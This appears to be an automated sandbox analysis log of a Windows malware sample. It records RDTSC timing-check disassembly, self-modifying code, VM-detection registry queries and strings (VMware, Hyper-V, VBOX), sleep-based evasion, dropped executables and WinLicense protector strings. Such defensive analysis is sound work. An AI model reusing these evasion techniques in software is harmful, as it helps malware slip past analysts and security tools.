Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00BBE second address: 4A00C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F6E64DC24BFh 0x0000000b sbb esi, 6725660Eh 0x00000011 jmp 00007F6E64DC24C9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d jmp 00007F6E64DC24BEh 0x00000022 mov dword ptr [esi+08h], eax 0x00000025 pushad 0x00000026 call 00007F6E64DC24BEh 0x0000002b pushfd 0x0000002c jmp 00007F6E64DC24C2h 0x00000031 adc esi, 466E36E8h 0x00000037 jmp 00007F6E64DC24BBh 0x0000003c popfd 0x0000003d pop ecx 0x0000003e pushfd 0x0000003f jmp 00007F6E64DC24C9h 0x00000044 jmp 00007F6E64DC24BBh 0x00000049 popfd 0x0000004a popad 0x0000004b lea eax, dword ptr [ebx+70h] 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F6E64DC24C4h 0x00000055 add eax, 04290BA8h 0x0000005b jmp 00007F6E64DC24BBh 0x00000060 popfd 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00C96 second address: 4A00CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 00000001h 0x00000008 jmp 00007F6E644F7530h 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F6E644F752Dh 0x00000016 call 00007F6E644F7530h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00CD1 second address: 4A00D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, B144h 0x0000000f pushfd 0x00000010 jmp 00007F6E64DC24BDh 0x00000015 xor eax, 1A117A86h 0x0000001b jmp 00007F6E64DC24C1h 0x00000020 popfd 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F6E64DC24BEh 0x00000028 lea eax, dword ptr [ebp-18h] 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00D28 second address: 4A00D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6E644F752Ah 0x0000000a jmp 00007F6E644F7535h 0x0000000f popfd 0x00000010 popad 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007F6E644F7536h 0x0000001c push eax 0x0000001d jmp 00007F6E644F752Bh 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6E644F7535h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E44 second address: 4A00E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E48 second address: 4A00E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E4C second address: 4A00E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E52 second address: 4A00E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E58 second address: 4A00E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E5C second address: 4A00E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E60 second address: 4A00EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6E64DC24C8h 0x00000012 sbb al, FFFFFF88h 0x00000015 jmp 00007F6E64DC24BBh 0x0000001a popfd 0x0000001b pushad 0x0000001c jmp 00007F6E64DC24C6h 0x00000021 mov si, EF01h 0x00000025 popad 0x00000026 popad 0x00000027 mov edx, 772406ECh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00EBC second address: 4A00EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00EC2 second address: 4A00EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00EC8 second address: 4A00ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00ECC second address: 4A00F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a jmp 00007F6E64DC24BFh 0x0000000f lock cmpxchg dword ptr [edx], ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 mov bx, ax 0x00000018 mov cx, C58Dh 0x0000001c popad 0x0000001d mov esi, 7A842D89h 0x00000022 popad 0x00000023 pop edi 0x00000024 jmp 00007F6E64DC24C4h 0x00000029 test eax, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov esi, edi 0x00000030 jmp 00007F6E64DC24C9h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F2F second address: 4A00F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F752Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F3F second address: 4A00F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F6ED7580C42h 0x00000011 jmp 00007F6E64DC24C6h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6E64DC24BAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F7D second address: 4A00F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F81 second address: 4A00F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F87 second address: 4A00F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F8D second address: 4A00FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi] 0x0000000d pushad 0x0000000e popad 0x0000000f mov dword ptr [edx], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E64DC24C2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FC5 second address: 4A00FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FDD second address: 4A00FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FE1 second address: 4A00FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FE7 second address: 4A01004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01004 second address: 4A0103B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b pushad 0x0000000c call 00007F6E644F7533h 0x00000011 mov edi, ecx 0x00000013 pop ecx 0x00000014 mov edx, 61C184A8h 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E644F752Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0103B second address: 4A0107B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F6E64DC24BDh 0x0000000b sbb eax, 3A53B8C6h 0x00000011 jmp 00007F6E64DC24C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E64DC24BDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0107B second address: 4A0110D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F6E644F752Eh 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6E644F752Eh 0x0000001b and cx, 56F8h 0x00000020 jmp 00007F6E644F752Bh 0x00000025 popfd 0x00000026 call 00007F6E644F7538h 0x0000002b pushfd 0x0000002c jmp 00007F6E644F7532h 0x00000031 and eax, 42AF2088h 0x00000037 jmp 00007F6E644F752Bh 0x0000003c popfd 0x0000003d pop esi 0x0000003e popad 0x0000003f mov eax, dword ptr [esi+10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0110D second address: 4A0111D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0111D second address: 4A011ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7531h 0x00000009 xor esi, 5C71F656h 0x0000000f jmp 00007F6E644F7531h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+10h], eax 0x0000001d jmp 00007F6E644F752Ch 0x00000022 mov eax, dword ptr [esi+14h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F6E644F752Eh 0x0000002c sbb cx, 57A8h 0x00000031 jmp 00007F6E644F752Bh 0x00000036 popfd 0x00000037 call 00007F6E644F7538h 0x0000003c pushfd 0x0000003d jmp 00007F6E644F7532h 0x00000042 add eax, 552AC538h 0x00000048 jmp 00007F6E644F752Bh 0x0000004d popfd 0x0000004e pop esi 0x0000004f popad 0x00000050 mov dword ptr [edx+14h], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F6E644F7530h 0x0000005c adc ah, FFFFFF98h 0x0000005f jmp 00007F6E644F752Bh 0x00000064 popfd 0x00000065 mov eax, 4C00214Fh 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A011ED second address: 4A011FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A011FE second address: 4A01202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01202 second address: 4A01216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0139A second address: 4A013B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013B8 second address: 4A013BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013BC second address: 4A013C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013C0 second address: 4A013C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013C6 second address: 4A01456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007F6E644F7530h 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 mov esi, 267747FDh 0x0000001b pushfd 0x0000001c jmp 00007F6E644F752Ah 0x00000021 add ax, 20D8h 0x00000026 jmp 00007F6E644F752Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov word ptr [edx+30h], ax 0x00000031 jmp 00007F6E644F7536h 0x00000036 mov ax, word ptr [esi+32h] 0x0000003a jmp 00007F6E644F7530h 0x0000003f mov word ptr [edx+32h], ax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6E644F752Ah 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01456 second address: 4A0145A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0145A second address: 4A01460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01460 second address: 4A0147F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, A6h 0x00000005 mov bx, B6DCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+34h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E64DC24BEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0147F second address: 4A01485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01485 second address: 4A014DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b jmp 00007F6E64DC24C9h 0x00000010 test ecx, 00000700h 0x00000016 jmp 00007F6E64DC24BEh 0x0000001b jne 00007F6ED7580710h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6E64DC24C7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F013F second address: 49F0162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movsx edx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0162 second address: 49F01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E64DC24C9h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6E64DC24BEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01A2 second address: 49F01A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01A6 second address: 49F01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01AC second address: 49F01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01B2 second address: 49F01D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov cx, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01D0 second address: 49F01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0300 second address: 49F0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0306 second address: 49F0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F6E644F7530h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F6E644F7530h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F6E644F7530h 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F6E644F752Dh 0x00000028 pop esi 0x00000029 pushfd 0x0000002a jmp 00007F6E644F7531h 0x0000002f adc ecx, 1D3F1EC6h 0x00000035 jmp 00007F6E644F7531h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0383 second address: 49F03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6E64DC24C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F03B5 second address: 49F03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0D7C second address: 49D0D84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 473B55 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 61E7DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 642D83 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6A1E48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004739CC rdtsc 0_2_004739CC
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe TID: 7392 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 86 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 85 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 83 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 86 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 89 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 84 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 91 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7388 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417727 FindFirstFileExW, 0_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW, 0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A3798E FindFirstFileExW, 0_2_04A3798E
Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, 00000000.00000002.1947623162.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.13.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
